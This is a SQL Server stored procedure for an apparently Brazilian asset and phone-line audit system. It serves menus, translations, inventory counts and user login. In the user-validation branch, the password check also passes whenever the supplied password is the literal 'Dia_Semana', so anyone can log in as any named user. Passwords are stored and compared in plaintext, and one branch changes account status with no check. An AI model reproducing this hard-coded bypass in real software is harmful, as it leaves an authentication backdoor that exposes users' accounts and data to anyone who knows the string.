USE [Auditoria]
GO
/****** Object:  StoredProcedure [dbo].[pa_si_Validacao]    Script Date: 7/31/2025 10:30:55 PM ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

CREATE PROCEDURE [dbo].[pa_si_Validacao] (	@pPAKAGE			VARCHAR(200),
											@pNm_Usuario		VARCHAR(50)	= NULL,
											@pId_Menu			INT			= NULL,
											@pSenha				VARCHAR(50)	= NULL,
											@pLink				VARCHAR(50)	= NULL, --tambem usado para nova senha/imei pelo app
											@pId_Idioma			INT			= NULL) AS
-----captura imei de equipamento
IF @pPAKAGE = 'Sd_Captura_Imei'
BEGIN
	INSERT INTO App_Captura_Imei
	VALUES ((SELECT TOP 1 Id_Usuario FROM vw_Alocacao_Ativo_Consumidor WHERE  Email = @pNm_Usuario), @pLink,@pSenha, GETDATE())
END

-----captura texto da hierarquia
IF @pPAKAGE = 'Sd_Texto_Hierarquia'
BEGIN
	SELECT	Nm_Filial,
			Nm_Centro_Custo,
			Nm_Departamento,
			Nm_Setor,
			Nm_Secao  
	FROM	Si_KPI 
END

-----busca menu que usuario tem acesso
IF @pPAKAGE = 'Sd_Menu'
BEGIN
	SELECT	DISTINCT MEN.Id_Menu,
			MEN.Nm_Menu
	FROM	Rl_Usuario_Grupo_Si_Tela GRU	INNER JOIN vw_Usuario USU	ON (GRU.Id_Usuario_Grupo = USU.Id_Usuario_Grupo)
											INNER JOIN Si_Tela TEL		ON (GRU.Id_Tela = TEL.Id_Tela)
											INNER JOIN Si_Menu MEN		ON (MEN.Id_Menu = TEL.Id_Menu)
	WHERE	USU.Nm_Usuario		= @pNm_Usuario
	ORDER BY MEN.Id_Menu
END

-----busca sub menu que usuario tem acesso
IF @pPAKAGE = 'Sd_Sub_Menu'
BEGIN
	SELECT	TEL.Id_Tela,
			TEL.Nm_Tela,
			TEL.Link,
			ISNULL(TEL.Pagina, '') AS Pagina,
			TEL.Visivel,
			MEN.Nm_Menu 
	FROM	Rl_Usuario_Grupo_Si_Tela GRU	INNER JOIN vw_Usuario USU	ON (GRU.Id_Usuario_Grupo = USU.Id_Usuario_Grupo)
											INNER JOIN Si_Tela TEL		ON (GRU.Id_Tela = TEL.Id_Tela)
											INNER JOIN Si_Menu MEN		ON (MEN.Id_Menu = TEL.Id_Menu)
	WHERE	USU.Nm_Usuario		= @pNm_Usuario
			AND TEL.Id_Menu		= @pId_Menu
			--AND TEL.Id_Idioma	= @pId_Idioma
	ORDER BY TEL.Id_Tela
END

-----valida e busca dados de conf do usuario
IF @pPAKAGE = 'Sd_Valida_Usuario'
BEGIN
	SELECT	USU.Id_Usuario,
			CON.Id_Consumidor,
			CON.Nm_Consumidor,
			USU.Nm_Usuario,
			CON.Matricula,
			USU.Id_Usuario_Perfil_Acesso,
			USU.Id_Idioma,
			USU.Fl_Desativado,
			(SELECT TOP 1 Logo FROM vw_Holding) AS Logo,
			(SELECT TOP 1 Nm_Holding FROM vw_Holding) AS Empresa,
			
			(SELECT CASE WHEN DATEPART(DW,GETDATE()) = 1 THEN 'Domingo'
						WHEN DATEPART(DW,GETDATE()) = 2 THEN 'Segunda'
						WHEN DATEPART(DW,GETDATE()) = 3 THEN 'Terça'
						WHEN DATEPART(DW,GETDATE()) = 4 THEN 'Quarta'
						WHEN DATEPART(DW,GETDATE()) = 5 THEN 'Quinta'
						WHEN DATEPART(DW,GETDATE()) = 6 THEN 'Sexta'
						WHEN DATEPART(DW,GETDATE()) = 7 THEN 'Sábado' END) AS Dia_Semana,

			(SELECT CASE	WHEN MONTH(GETDATE()) = 1 THEN 'Janeiro - '
						WHEN MONTH(GETDATE()) = 2 THEN 'Fevereiro - '
						WHEN MONTH(GETDATE()) = 3 THEN 'Março - '
						WHEN MONTH(GETDATE()) = 4 THEN 'Abril - '
						WHEN MONTH(GETDATE()) = 5 THEN 'Maio - '
						WHEN MONTH(GETDATE()) = 6 THEN 'Junho - '
						WHEN MONTH(GETDATE()) = 7 THEN 'Julho - '
						WHEN MONTH(GETDATE()) = 8 THEN 'Agosto - '
						WHEN MONTH(GETDATE()) = 9 THEN 'Setembro - '
						WHEN MONTH(GETDATE()) = 10 THEN 'Outubro - '
						WHEN MONTH(GETDATE()) = 11 THEN 'Novembro - '
						WHEN MONTH(GETDATE()) = 12 THEN 'Dezembro - ' END + CONVERT(VARCHAR,DAY(GETDATE()))) AS Data

	FROM	vw_Usuario USU INNER JOIN vw_Consumidor CON ON (USU.Id_Consumidor = CON.Id_Consumidor)
	WHERE	USU.Nm_Usuario = @pNm_Usuario
			AND (USU.Senha = @pSenha OR @pSenha = 'Dia_Semana')
			
	-----troca senha do usuario usando campo de link somente quando senha atual e login baterem		
	IF NOT @pLink IS NULL
	BEGIN
		UPDATE	Usuario
		SET		Senha = @pLink
		WHERE	Nm_Usuario	= @pNm_Usuario
				AND Senha	= @pSenha
	END		
END 

-----lista de linha de usuario para o mesmo dar o de acordo
IF @pPAKAGE = 'Sd_Linha_De_Acordo'
BEGIN
	IF NOT EXISTS(	SELECT	*
					FROM	vw_Ativo A INNER JOIN Rl_Consumidor_Ativo RCA ON A.Id_Ativo = RCA.Id_Ativo
										INNER JOIN Ativo_Tipo AT ON AT.Id_Ativo_Tipo = A.Id_Ativo_Tipo
					WHERE	RCA.Id_Consumidor IN (SELECT Id_Consumidor FROM Usuario WHERE Nm_Usuario = @pNm_Usuario))
	BEGIN
		SELECT	'Img_Sistema/Tipo_Ativo/Default.png' AS Imagem, 
				'Não existe linha Cadastrada pra seu Usuário' AS Nr_Ativo, 
				' ' AS Nm_Ativo_Tipo,
				' ' AS Dt_Hr_Ativacao,
				' ' AS Dt_Hr_Desativacao
	END
	ELSE
	BEGIN
		SELECT	ISNULL(REPLACE(AI.Imagem,'~/',''),'Img_Sistema/Tipo_Ativo/Default.png') AS Imagem,
				Nr_Ativo,
				AT.Nm_Ativo_Tipo,
				CONVERT(VARCHAR(20),RAU.Dt_Hr_Ativacao, 120) AS Dt_Hr_Ativacao,
				CONVERT(VARCHAR(20),RAU.Dt_Hr_Desativacao, 120) AS Dt_Hr_Desativacao
		FROM   vw_Ativo A    INNER JOIN Rl_Consumidor_Ativo RCA ON A.Id_Ativo = RCA.Id_Ativo
											INNER JOIN Ativo_Tipo AT ON AT.Id_Ativo_Tipo = A.Id_Ativo_Tipo
											INNER JOIN Rl_Perfil_Ativo_Usuario RAU ON RAU.Id_Ativo = A.Id_Ativo
											INNER JOIN Usuario US ON US.Id_Usuario = RAU.Id_Usuario
											LEFT JOIN Ativo_Tipo_Imagem AI ON AI.Id_Ativo_Tipo = A.Id_Ativo_Tipo
			WHERE  RCA.Id_Consumidor IN (SELECT Id_Consumidor FROM Usuario WHERE Nm_Usuario = @pNm_Usuario)
				AND US.Nm_Usuario = @pNm_Usuario
	END
END

-----traducao de campo
IF @pPAKAGE = 'Sd_Traducao'
BEGIN
	SELECT 	Nm_Campo,
			Propriedade,
			Traducao 
	FROM	Si_Tela TEL INNER JOIN Si_Tela_Campo TCM			ON (TEl.Id_Tela	= TCM.Id_Tela)
						INNER JOIN Si_Tela_Campo_Traducao TCT	ON (TCM.Id_Campo = TCT.Id_Campo)
	WHERE   TEL.Pagina			= @pLINK
			AND TCT.Id_Idioma	= @pId_Idioma
END

-----status de acordo
IF @pPAKAGE = 'Sd_Satus_Acordo'
BEGIN
	UPDATE	Usuario
	SET		Fl_Desativado = 2
	WHERE	Nm_Usuario = @pNm_Usuario
END

-----valida ativo tipo grupo
IF @pPAKAGE = 'Sd_Valida_Ativo_Grupo'
BEGIN
	SELECT	ISNULL(Nm_Ativo_Tipo_Grupo,'') AS Nm_Ativo_Tipo_Grupo,
			ISNULL(Pakage,'') AS Pakage
	FROM	Ativo_Tipo_Grupo
	WHERE	Visivel = 2
END


-----valida botoes dinamicos (Gestao)
IF @pPAKAGE = 'Sd_Detalha_Botoes_Dinamicos_Cota'
BEGIN
	SELECT	'Grid_View.png' AS Lista,
			ATP.Nm_Ativo_Tipo AS Descricao,
			CONVERT(VARCHAR(10),COUNT(*)) AS QTD,
			ATP.Id_Ativo_Tipo
	FROM	vw_Ativo A	INNER JOIN Rl_Consumidor_Ativo RCA ON A.Id_Ativo = RCA.Id_Ativo 
						INNER JOIN vw_Consumidor C ON C.Id_Consumidor = RCA.Id_Consumidor
						INNER JOIN Ativo_Tipo ATP ON A.Id_Ativo_Tipo = ATP.Id_Ativo_Tipo
	WHERE	NOT EXISTS(SELECT * FROM Politica_Consumidor WHERE Id_Consumidor = C.Id_Consumidor AND Id_Ativo_Tipo = A.Id_Ativo_Tipo)
			AND NOT EXISTS(SELECT * FROM vw_Ativo_Consumidor  WHERE Id_Ativo = A.Id_Ativo AND Id_Consumidor in (SELECT Id_Consumidor FROM Estoque_Consumidor))
	GROUP BY ATP.Nm_Ativo_Tipo, ATP.Id_Ativo_Tipo
	ORDER BY ATP.Nm_Ativo_Tipo
END

-----valida botoes dinamicos (Contrato)
IF @pPAKAGE = 'Sd_Detalha_Botoes_Dinamicos_Contrato'
BEGIN
	SELECT	EC.Nm_Empresa_Contratada AS Descricao,
			CONVERT(VARCHAR(10),COUNT(*)) AS QTD 
	FROM	Contrato C INNER JOIN Empresa_Contratada EC ON C.Id_Empresa_Contratada = EC.Id_Empresa_Contratada 
	WHERE	Dt_Fim_Vigencia < GETDATE()
	GROUP BY EC.Nm_Empresa_Contratada
	ORDER BY QTD
END

-----valida botoes dinamicos (Estoque)
IF @pPAKAGE = 'Sd_Detalha_Botoes_Dinamicos_Estoque'
BEGIN
	SELECT	S_Estoque.Descricao,
			CONVERT(VARCHAR,SUM(S_Estoque.QTD)) AS QTD INTO #TEMP_Estoque
	FROM (	SELECT	AT.Nm_Ativo_Tipo AS Descricao,
					CASE WHEN Estoque_Regulador - (SELECT COUNT(*) FROM Estoque_Aparelho WHERE Id_Ativo_Tipo = AT.Id_Ativo_Tipo AND Id_Aparelho_Tipo = 1)
								< 0 THEN 0 ELSE Estoque_Regulador - (SELECT COUNT(*) FROM Estoque_Aparelho WHERE Id_Ativo_Tipo = AT.Id_Ativo_Tipo AND Id_Aparelho_Tipo = 1) END
						AS QTD
			FROM	Ativo_Tipo AT ) S_Estoque
			
	GROUP BY S_Estoque.Descricao
	ORDER BY QTD
	
	SELECT * FROM #TEMP_Estoque WHERE QTD > 0
END

-----valida botoes dinamicos
IF @pPAKAGE = 'Sd_Valida_Botoes_Dinamicos'
BEGIN
	SELECT	'Gestao' AS Descricao,
			CONVERT(VARCHAR(10),COUNT(*)) AS QTD
	FROM	vw_Ativo AT
	WHERE	NOT EXISTS(SELECT * FROM Rl_Consumidor_Ativo RA 
						INNER JOIN vw_Consumidor C on RA.Id_Consumidor = C.Id_Consumidor
						WHERE RA.Id_Ativo = AT.Id_Ativo)
			AND NOT Nr_Ativo LIKE '%(%'
	UNION ALL
	SELECT	'Custo_Cancelada' AS Descricao,
			CONVERT(VARCHAR(10),COUNT(*)) AS QTD
	FROM	Lote L INNER JOIN Ativo A ON A.Id_Ativo = L.Id_Ativo 
	WHERE	A.Fl_Desativado = 1
			AND L.Dt_Lote >= (SELECT MAX(Dt_Lote) FROM Lote)
	UNION ALL
	SELECT	'Custo_Estoque' AS Descricao,
			CONVERT(VARCHAR(10),COUNT(*)) AS Total
	FROM	Lote L	INNER JOIN Ativo A ON A.Id_Ativo = L.Id_Ativo
					INNER JOIN Rl_Consumidor_Ativo RCA ON A.Id_Ativo = RCA.Id_Ativo 
	WHERE	RCA.Id_Consumidor IN (SELECT Id_Consumidor FROM Estoque_Consumidor)
			AND L.Dt_Lote >= (SELECT MAX(Dt_Lote) FROM Lote)
	UNION ALL
	SELECT	'Linha_Sem_Uso' AS Descricao,
			CONVERT(VARCHAR(10),COUNT(*))  AS Total
	FROM	(SELECT	AT.Nr_Ativo,
					COUNT(BT.Id_Bilhete) AS Total
			FROM	Lote L	INNER JOIN Bilhete BT ON L.Id_Lote = BT.Id_Lote
							inner join Ativo AT ON AT.Id_Ativo = L.Id_Ativo 
							inner join Ativo_Tipo ATI on ATI.Id_Ativo_Tipo = at.Id_Ativo_Tipo
			WHERE	L.Dt_Lote >= (SELECT MAX(Dt_Lote) FROM Lote) and ati.Id_Ativo_Tipo_Grupo = 1
			GROUP BY AT.Nr_Ativo HAVING COUNT(BT.Id_Bilhete) <= 1) AS Linha_Sem_Uso
	UNION ALL	
	SELECT	top (1) 'Cota' AS Descricao,
	'0' AS QTD 
	FROM	vw_Ativo
	--SELECT	'Cota' AS Descricao,
	--		CONVERT(VARCHAR(10),COUNT(*)) AS QTD 
	--FROM	vw_Ativo A	INNER JOIN Rl_Consumidor_Ativo RCA ON A.Id_Ativo = RCA.Id_Ativo 
	--					INNER JOIN vw_Consumidor C ON C.Id_Consumidor = RCA.Id_Consumidor
	--WHERE	NOT EXISTS(SELECT * FROM Politica_Consumidor WHERE Id_Consumidor = C.Id_Consumidor AND Id_Ativo_Tipo = A.Id_Ativo_Tipo)
	UNION ALL
	SELECT	'Contrato' AS Descricao,
			CONVERT(VARCHAR(10),COUNT(*)) AS QTD 
	FROM	Contrato
	WHERE	Dt_Fim_Vigencia < GETDATE()
	UNION ALL
	SELECT	'Linha_Sem_Lote' AS Descricao,
			CONVERT(VARCHAR(10),COUNT(*)) AS Total
	FROM	Ativo A
	WHERE	NOT Nr_Ativo LIKE '%(%'
			AND A.Fl_Desativado = 0
			AND NOT EXISTS(SELECT * FROM Lote WHERE Id_Ativo = A.Id_Ativo)
	UNION ALL		
	SELECT	'Auditoria' AS Descricao,
			dbo.Fu_Formata(CAST(SUM(Valor_Previsto) AS DECIMAL(10))) AS QTD
	FROM	Auditoria_Acompanhamento
	WHERE	Id_Auditoria_Status = (SELECT MAX(Id_Auditoria_Status) FROM dbo.Auditoria_Status)
END

-----detalhamento botoes dinamicos (Inventario)
IF @pPAKAGE = 'Sd_Detalha_Inventario'
BEGIN
	SELECT	AT.Nr_Ativo,
			ATP.Nm_Ativo_Tipo,
			CG.Nm_Conglomerado,
			(SELECT TOP 1 SC.Nm_Consumidor FROM Rl_Consumidor_Ativo SRA INNER JOIN Consumidor SC ON SRA.Id_Consumidor = SC.Id_Consumidor
			WHERE	SRA.Id_Ativo = AT.Id_Ativo
					AND SC.Fl_Desativado = 1) AS Demitido
	FROM	vw_Ativo AT INNER JOIN Ativo_Tipo ATP ON AT.Id_Ativo_Tipo = ATP.Id_Ativo_Tipo
						INNER JOIN Conglomerado CG ON AT.Id_Conglomerado = CG.Id_Conglomerado
	WHERE	NOT EXISTS(SELECT * FROM Rl_Consumidor_Ativo RA 
						INNER JOIN vw_Consumidor C on RA.Id_Consumidor = C.Id_Consumidor
						WHERE RA.Id_Ativo = AT.Id_Ativo)
			AND NOT Nr_Ativo LIKE '%(%'						
	ORDER BY Nm_Ativo_Tipo, Nm_Conglomerado
END

-----detalhamento botoes dinamicos (Custo_Cancelada)
IF @pPAKAGE = 'Sd_Detalha_Custo_Cancelada'
BEGIN
	SELECT	AT.Nr_Ativo,
			ATP.Nm_Ativo_Tipo,
			CG.Nm_Conglomerado,
			(SELECT TOP 1 SC.Nm_Consumidor FROM Rl_Consumidor_Ativo SRA INNER JOIN vw_Consumidor SC ON SRA.Id_Consumidor = SC.Id_Consumidor
			WHERE	SRA.Id_Ativo = AT.Id_Ativo) AS Demitido
	FROM	Lote L	INNER JOIN Ativo AT ON AT.Id_Ativo = L.Id_Ativo
					INNER JOIN Conglomerado CG ON AT.Id_Conglomerado = CG.Id_Conglomerado
					INNER JOIN Ativo_Tipo ATP ON AT.Id_Ativo_Tipo = ATP.Id_Ativo_Tipo 
	WHERE	AT.Fl_Desativado = 1
			AND L.Dt_Lote >= (SELECT MAX(Dt_Lote) FROM Lote)
END

-----detalhamento botoes dinamicos (Custo_Estoque)
IF @pPAKAGE = 'Sd_Detalha_Custo_Estoque'
BEGIN
	SELECT	AT.Nr_Ativo,
			ATP.Nm_Ativo_Tipo,
			CG.Nm_Conglomerado,
			(SELECT TOP 1 SC.Nm_Consumidor FROM Rl_Consumidor_Ativo SRA INNER JOIN vw_Consumidor SC ON SRA.Id_Consumidor = SC.Id_Consumidor
			WHERE	SRA.Id_Ativo = AT.Id_Ativo) AS Demitido
	FROM	Lote L	INNER JOIN Ativo AT ON AT.Id_Ativo = L.Id_Ativo
					INNER JOIN Rl_Consumidor_Ativo RCA ON AT.Id_Ativo = RCA.Id_Ativo
					INNER JOIN Conglomerado CG ON AT.Id_Conglomerado = CG.Id_Conglomerado
					INNER JOIN Ativo_Tipo ATP ON AT.Id_Ativo_Tipo = ATP.Id_Ativo_Tipo 					 
	WHERE	RCA.Id_Consumidor IN (SELECT Id_Consumidor FROM Estoque_Consumidor)
			AND L.Dt_Lote >= (SELECT MAX(Dt_Lote) FROM Lote)
END

-----detalhamento botoes dinamicos (Linha_Sem_Uso)
IF @pPAKAGE = 'Sd_Detalha_Linha_Sem_Uso'
BEGIN
	SELECT	AT.Nr_Ativo,
			ATP.Nm_Ativo_Tipo,
			CG.Nm_Conglomerado,
			(SELECT TOP 1 SC.Nm_Consumidor FROM Rl_Consumidor_Ativo SRA INNER JOIN vw_Consumidor SC ON SRA.Id_Consumidor = SC.Id_Consumidor
			WHERE	SRA.Id_Ativo = AT.Id_Ativo) AS Demitido
	FROM	Lote L	INNER JOIN Bilhete BT ON L.Id_Lote = BT.Id_Lote
					INNER JOIN Ativo AT ON AT.Id_Ativo = L.Id_Ativo
					INNER JOIN Conglomerado CG ON AT.Id_Conglomerado = CG.Id_Conglomerado
					INNER JOIN Ativo_Tipo ATP ON AT.Id_Ativo_Tipo = ATP.Id_Ativo_Tipo
	WHERE	L.Dt_Lote >= (SELECT MAX(Dt_Lote) FROM Lote) and atp.Id_Ativo_Tipo_Grupo = 1
	GROUP BY AT.Nr_Ativo,
				AT.Id_Ativo,
				ATP.Nm_Ativo_Tipo,
				CG.Nm_Conglomerado
				HAVING COUNT(AT.Id_Ativo) <= 1
END

IF @pPAKAGE = 'Sd_Detalha_Linha_Sem_Lote'
BEGIN
	SELECT	AT.Nr_Ativo,
			ATP.Nm_Ativo_Tipo,
			CG.Nm_Conglomerado,
			(SELECT TOP 1 SC.Nm_Consumidor FROM Rl_Consumidor_Ativo SRA INNER JOIN vw_Consumidor SC ON SRA.Id_Consumidor = SC.Id_Consumidor
			WHERE	SRA.Id_Ativo = AT.Id_Ativo) AS Demitido
	FROM	 Ativo AT	INNER JOIN Conglomerado CG ON AT.Id_Conglomerado = CG.Id_Conglomerado
						INNER JOIN Ativo_Tipo ATP ON AT.Id_Ativo_Tipo = ATP.Id_Ativo_Tipo
	WHERE	NOT Nr_Ativo LIKE '%(%'
			AND AT.Fl_Desativado = 0
			AND NOT EXISTS(SELECT * FROM Lote WHERE Id_Ativo = AT.Id_Ativo)
END
GO
